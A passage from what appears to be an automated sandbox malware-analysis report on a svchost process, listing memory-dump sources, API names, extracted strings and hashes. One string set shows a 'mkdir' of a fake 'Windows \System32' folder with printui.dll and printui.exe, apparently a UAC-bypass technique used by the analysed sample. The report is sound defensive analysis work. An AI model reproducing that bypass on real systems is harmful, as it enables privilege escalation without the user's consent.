            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FormatInfoLocaleMessage
            • String ID: !x-sys-default-locale
            • API String ID: 4235545615-2729719199
            • Opcode ID: ebab738b5480230e0b75425b37b28362b2ea768738c9a3c9646cf7035d34c8be
            • Instruction ID: 6bffafc75b852078d1e0b6b8520449f7123998dff717402fd4153e4b26cf7c1a
            • Opcode Fuzzy Hash: ebab738b5480230e0b75425b37b28362b2ea768738c9a3c9646cf7035d34c8be
            • Instruction Fuzzy Hash: 9901A171E1C78582E7539F12A840B6A67A2FB96BC8F448035DA4D46AA4CF3CE401CB40
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: InfoLocalegetenv
            • String ID: GETTEXT_MUI
            • API String ID: 2555521601-170423343
            • Opcode ID: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
            • Instruction ID: b49fcd2a8cc74ed5b70951584eef059db10b4d9fdf0e1c9750844e1486022657
            • Opcode Fuzzy Hash: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
            • Instruction Fuzzy Hash: A8F06DB4720A6BD1EF549F16E8E03B12222FF10349FC48536C61E436A4EF6DC5A8C340
            APIs
            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FFA41874BAA), ref: 00007FFA418737BD
              • Part of subcall function 00007FFA41873240: VirtualProtect.KERNEL32 ref: 00007FFA4187335D
              • Part of subcall function 00007FFA41873240: VirtualProtect.KERNEL32 ref: 00007FFA4187338E
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual$InfoLocale
            • String ID: GetLocaleInfoEx
            • API String ID: 3721377114-2904428671
            • Opcode ID: cdb5dca6fce8f04672f1ac76295893a24b1d6bd1a07679733b4b96729e29bd1c
            • Instruction ID: 4d95357bc9439ce8a5cc6ef5c37d553806b589e527b54357f4cdb9c0db1249bb
            • Opcode Fuzzy Hash: cdb5dca6fce8f04672f1ac76295893a24b1d6bd1a07679733b4b96729e29bd1c
            • Instruction Fuzzy Hash: 0C018471B0CA8681EB03AB16A9404A9A790AF56BE4F58C635DE3C437F6DE7CF441C740
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FFA41882031,?,00000000,00000092,?,?,00000000,?,00007FFA418749D7), ref: 00007FFA418818CE
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • API String ID: 2099609381-0
            • Opcode ID: 19eff94abd2ee9af0b536b7ed5e4bc3551f9b0ac4d3a1720833804b34edfc57f
            • Instruction ID: 82f0a6ffd473d13e1c05ff0921bf41761c93f453b903ca7b65755e961b093824
            • Opcode Fuzzy Hash: 19eff94abd2ee9af0b536b7ed5e4bc3551f9b0ac4d3a1720833804b34edfc57f
            • Instruction Fuzzy Hash: 2811D263E2C6458EEB17AF15D0806B87BA1EB41BA0F448235C66D433E0CF28E5D1C740
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FFA41881FEC,?,00000000,00000092,?,?,00000000,?,00007FFA418749D7), ref: 00007FFA4188197E
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • API String ID: 2099609381-0
            • Opcode ID: 81d34820adff455eda3628da7156e63bcc0a57b6e9274a33e99e7bf0e383b950
            • Instruction ID: fc086cf80d7172f2573b5b5c02bcffc7bd252a7db804dd5d1e2cff0d37871f3b
            • Opcode Fuzzy Hash: 81d34820adff455eda3628da7156e63bcc0a57b6e9274a33e99e7bf0e383b950
            • Instruction Fuzzy Hash: E701B562F0C6854AE7176B16E8807B976A1EB42BA4F85C231D67D472E5DF68B4818700
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FFA41873708,?,?,?,?,?,?,?,?,00000000,00007FFA41880E60), ref: 00007FFA418731E2
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • API String ID: 2099609381-0
            • Opcode ID: 683c7a8f2507ae2b82dc6c3f6d9d014f294459f43e8d5f8831770356cdcd6c69
            • Instruction ID: d5c8e3b59078fdcc603d74dc7c65c8020fd2be9d94232e35277e8d7cf35edcd2
            • Opcode Fuzzy Hash: 683c7a8f2507ae2b82dc6c3f6d9d014f294459f43e8d5f8831770356cdcd6c69
            • Instruction Fuzzy Hash: FCF05E32A0CA4582E702EB55F98076973A1FB99B88F54C034D65D83775CF3CE490C700
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: EnumSystemLocalesEx
            • API String ID: 544645111-2492367753
            • Opcode ID: 6b8a00f93e1b2e292eb0bf6ff0e04f1641f2bbe8da5e8726a8779b7fa072daa7
            • Instruction ID: 085b9a3407452b3e81da8633d142174b87006a95bcc15cea6f7388ed1aa0d330
            • Opcode Fuzzy Hash: 6b8a00f93e1b2e292eb0bf6ff0e04f1641f2bbe8da5e8726a8779b7fa072daa7
            • Instruction Fuzzy Hash: AE118271A0DB4591DB03EB11E9800AAB3A0FB86790F448632FAAD037B5DF3CE505C740
            Memory Dump Source
            • Source File: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • Opcode ID: ddf024e5494fbb1b9238d2636b768ef58eca434702f95cbda3c3dc157ea1ff39
            • Instruction ID: 4c97fa6fd833a9e76881f4295507de45c59bd485769703f1275afbae5ca1a433
            • Opcode Fuzzy Hash: ddf024e5494fbb1b9238d2636b768ef58eca434702f95cbda3c3dc157ea1ff39
            • Instruction Fuzzy Hash: B4C08C8714EFC5C5C20205EC492A0343E421823C2A248848A4BE207645D60600C18202
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • Opcode ID: f3bb7faf65393c565c05d225c9238ea9b96888a9d37cf71d20cbd9873539937c
            • Instruction ID: 9722bb05da709e53f04c67b63ac9c7668817aec5a0fdc934dbbbe72f180d3e9b
            • Opcode Fuzzy Hash: f3bb7faf65393c565c05d225c9238ea9b96888a9d37cf71d20cbd9873539937c
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$getenv$_getcwdabortpthread_rwlock_rdlockpthread_rwlock_unlockstrchrstrcmp
            • String ID: .mo$GETTEXT_LOG_UNTRANSLATED$LANGUAGE$LC_ALL$LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX$POSIX$c:/pgBuild64/share/locale
            • API String ID: 3750947721-4007712117
            • Opcode ID: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
            • Instruction ID: f011620836108e1b7c2009a97093d1dd8185af0f3e35be7b8fe576876f480b0b
            • Opcode Fuzzy Hash: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
            • Instruction Fuzzy Hash: 7002EDB6715A49CAEF24CF26A4507A837A9FB05B98FC48216DE6D177C4EF39C058C340
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
            • API String ID: 2943138195-1482988683
            • Opcode ID: 87e75bcd8e13d27318c9b3ae135581f593509bc96b4b1190e75867da8dc5a9e5
            • Instruction ID: d92579305280aaa0bb8df7e5ab891dc58b343c2756a00902f4ca159b2015594f
            • Opcode Fuzzy Hash: 87e75bcd8e13d27318c9b3ae135581f593509bc96b4b1190e75867da8dc5a9e5
            • Instruction Fuzzy Hash: 31022B62E1D71298FB17AF64D8942BC3BA0FB0674CF908139DA0D26AB9DF68B544C740
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$mkdir "\\?\{}Windows \System32"${}Windows \System32${}Windows \System32\printui.dll${}Windows \System32\printui.exe${}Windows\System32\printui.exe
            • API String ID: 0-1428769780
            • Opcode ID: 7d5c9f599b346ccc149d9ba35ca209140a4bcc298a926c484218a5f1fff24114
            • Instruction ID: 68f38e1ec3e9f23518520c879c910f784b113822e6427af228ff7fdcffee015e
            • Opcode Fuzzy Hash: 7d5c9f599b346ccc149d9ba35ca209140a4bcc298a926c484218a5f1fff24114
            • Instruction Fuzzy Hash: 2D12513291CBC6D5E762EB14E4843EAA3A0FB99344F509135DBCC52A6AEF7CD185CB40
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: malloc$AddressErrorHandleLastModuleProcfreegetenvstrlen
            • String ID: Control Panel\Desktop\ResourceLocale$GETTEXT_MUI$GetUserDefaultUILanguage$GetUserPreferredUILanguages$kernel32
            • API String ID: 3902095595-2289094478
            • Opcode ID: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
            • Instruction ID: 38b5980a306fdc30fed06c58795f7f79584b12b8151343d07193e4e45856cd52
            • Opcode Fuzzy Hash: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
            • Instruction Fuzzy Hash: 298114A232568A85FF24CB15E89876A63A1FB45B99FC44121DF6903BD9EF7DC089C700
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: isspace$memcpy$fgetsstrchrstrlen$fclosefeoffopenstrncmp
            • String ID: /locale.$alia
            • API String ID: 523396729-523676055
            • Opcode ID: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
            • Instruction ID: d9bb909458fd9b5863b6121e32ed405b49ccec497aac49aec8738c1b05d92f08
            • Opcode Fuzzy Hash: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
            • Instruction Fuzzy Hash: C391E6B6705B9A84EF048B62A91436E77B2FB04BDDF848516CE6D17798EF39C069C300
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$abortfopenfputcfreemallocmemcpypthread_mutex_lockpthread_mutex_unlockstrchrstrcmp
            • String ID: msgctxt $msgid $msgid_plural $msgstr ""$msgstr[0] ""$domain
            • API String ID: 985736648-3246038991
            • Opcode ID: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
            • Instruction ID: 5976ffaac5bd5dce512531b6ec285da5e1eb20cad23f156419773a073e7cc1d2
            • Opcode Fuzzy Hash: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
            • Instruction Fuzzy Hash: 4C418FA938164E94EE14DB57E8643B92392BB49FC5FC89632CD2A4B398DF3DC0588310
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
            • API String ID: 909987262-1539746584
            • Opcode ID: e1e2e079e8a673b8d874318a6694035d43fa62b137bba7c28d4073b1fa81819e
            • Instruction ID: 9ea2bb76e53fe0cefafa456f18a9376f18b3ab948a03619392a22af0de8a8f86
            • Opcode Fuzzy Hash: e1e2e079e8a673b8d874318a6694035d43fa62b137bba7c28d4073b1fa81819e
            • Instruction Fuzzy Hash: 1F21B972A1C606DBE747BB18D8990B823B0AFA2740F918431D31D825B3FF6DA956CF14
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocale$strcmpstrlen
            • String ID: _
            • API String ID: 3672321321-701932520
            • Opcode ID: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
            • Instruction ID: bb44e0de26bf85c71b238b67b84ca6518bbae0052568d87d8f6fc6d2fa8fb069
            • Opcode Fuzzy Hash: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
            • Instruction Fuzzy Hash: B481F3A670868D86DF11CB16E50036AA762F78ABC8FC4851ADFAD17B98DF38D549C700
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$Replicator::operator[]
            • String ID: `anonymous namespace'
            • API String ID: 3863519203-3062148218
            • Opcode ID: 1025994bbc4b37975501bb550bfe6818d6f3d3c9b3b1cd8a21ac3afcfec9cd77
            • Instruction ID: e1326a16e940d8aa9ab38a15716e60cbb6b06b5680967de6fa084bdbef0c3346
            • Opcode Fuzzy Hash: 1025994bbc4b37975501bb550bfe6818d6f3d3c9b3b1cd8a21ac3afcfec9cd77
            • Instruction Fuzzy Hash: BCE18B76A0CB8289EB13EF25D4801ED77A1FB46788F408536EA4D67B66DF38E554C700
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
